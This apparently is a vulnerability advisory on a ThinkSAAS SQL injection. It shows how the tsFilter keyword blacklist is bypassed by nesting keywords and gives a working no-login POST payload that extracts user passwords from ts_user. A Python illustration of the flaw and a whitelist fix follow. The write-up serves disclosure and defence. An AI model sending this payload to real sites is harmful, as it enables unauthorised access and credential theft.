### Brief description:
The latest version of ThinkSAAS can still be injected by bypassing its filter. No GPC restriction; no login required.

### Detailed description:
Analysis of the old version: [WooYun: ThinkSAAS SQL Injection #6](http://www.wooyun.org/bugs/wooyun-2013-046826)

The new version contains two fixes.

The first fix, in file \app\tag\action\add.php:

```
case "do":
    $objname = tsFilter($_POST['objname']);
    $idname = tsFilter($_POST['idname']);
    $objid = intval($_POST['objid']);
    $tags = t($_POST['tags']);
    $new['tag']->addTag($objname,$idname,$objid,$tags);
    tsNotice('标签添加成功!');
    break;
```

The earlier t function was replaced with tsFilter.

The second fix, in file \thinksaas\tsApp.php:

```
foreach ( $row as $key => $value ) {
    $value = $this->escape ( $value );
    //$vals [] = "`$key` = $value";
    $vals [] = "{$key} = {$value}";
}
```

The $value variable is now passed through escape, and a new assignment was added to build the SQL statement. Note that only $value is escaped; $key is interpolated unchanged, so whatever tsFilter lets through in objname reaches the statement as-is. With this patch we can still inject.

Let's look at the tsFilter function:

```
function tsFilter($value){
    $value = trim($value);
    // define the SQL commands and keywords that may not be submitted
    $words = array();
    $words[] = "add ";
    $words[] = "and ";
    $words[] = "count ";
    $words[] = "order ";
    $words[] = "table ";
    $words[] = "by ";
    $words[] = "create ";
    $words[] = "delete ";
    $words[] = "drop ";
    $words[] = "from ";
    $words[] = "grant ";
    $words[] = "insert ";
    $words[] = "select ";
    $words[] = "truncate ";
    $words[] = "update ";
    $words[] = "use ";
    $words[] = "--";
    $words[] = "#";
    $words[] = "group_concat";
    $words[] = "column_name";
    $words[] = "information_schema.columns";
    $words[] = "table_schema";
    $words[] = "union ";
    $words[] = "where ";
    $words[] = "alert";
    $value = strtolower($value); // convert to lower case
    foreach($words as $word){
        if(strstr($value,$word)){
            $value = str_replace($word,'',$value);
        }
    }
    return $value;
}
```

It is easy to see that rewriting, for example, “select” as “selselect ect” bypasses the filter: each keyword is stripped in a single pass and the result is never scanned again.

So the final exp that extracts data is:

EXP:
```
链接:http://localhost/thinksaas/index.php?app=tag&ac=add&ts=do
post:objname=article=1, tagname=(selselect ect pwd frofrom m ts_user limit 0,1), count_group&idname=1&objid=1&tags=111111
```

[![1.png](https://images.seebug.org/upload/201403/11130241c3aefbdb9bf62dc449a6268c5990641b.png)](https://images.seebug.org/upload/201403/11130241c3aefbdb9bf62dc449a6268c5990641b.png)

[![2.png](https://images.seebug.org/upload/201403/111302488e036adcf4c7bdfd99acf6f0b6d8fdff.png)](https://images.seebug.org/upload/201403/111302488e036adcf4c7bdfd99acf6f0b6d8fdff.png)

### Proof of vulnerability:
See the detailed description.
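As an added illustration (not ThinkSAAS code), the Python below ports the keyword-stripping logic of the tsFilter() shown above, shows that a second scan of its output still finds the stripped keywords, and contrasts it with a whitelist check suited to objname/idname, which the application splices into SQL as identifiers. The function names ts_filter, is_safe_identifier and classify and the sample inputs are constructed for this example.

```python
import re

# Keyword list copied from the tsFilter() in the report. Order matters: each word is
# stripped in one pass with a plain replace, and the result is never re-scanned.
BLACKLIST = ["add ", "and ", "count ", "order ", "table ", "by ", "create ", "delete ",
             "drop ", "from ", "grant ", "insert ", "select ", "truncate ", "update ",
             "use ", "--", "#", "group_concat", "column_name",
             "information_schema.columns", "table_schema", "union ", "where ", "alert"]

def ts_filter(value: str) -> str:
    """Port of the PHP tsFilter(): trim, lowercase, then strip each word once."""
    value = value.strip().lower()
    for word in BLACKLIST:
        if word in value:
            value = value.replace(word, "")
    return value

# Defensive alternative (constructed for this example): objname/idname are used as SQL
# identifiers, so accept only a plain identifier instead of stripping a blacklist.
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")

def is_safe_identifier(value: str) -> bool:
    return IDENT_RE.fullmatch(value) is not None

def classify(value: str) -> dict:
    """Compare what the blacklist lets through with what the whitelist decides."""
    filtered = ts_filter(value)
    return {
        "after_blacklist": filtered,
        # A second pass over the filtered output finds keywords the first pass created.
        "blacklist_still_dangerous": any(w in filtered for w in BLACKLIST),
        "whitelist_accepts": is_safe_identifier(value),
    }

if __name__ == "__main__":
    # Constructed inputs: a legitimate object name and the doubled-keyword pattern.
    for sample in ["article", "selselect ect pwd frofrom m ts_user"]:
        print(sample, "->", classify(sample))
```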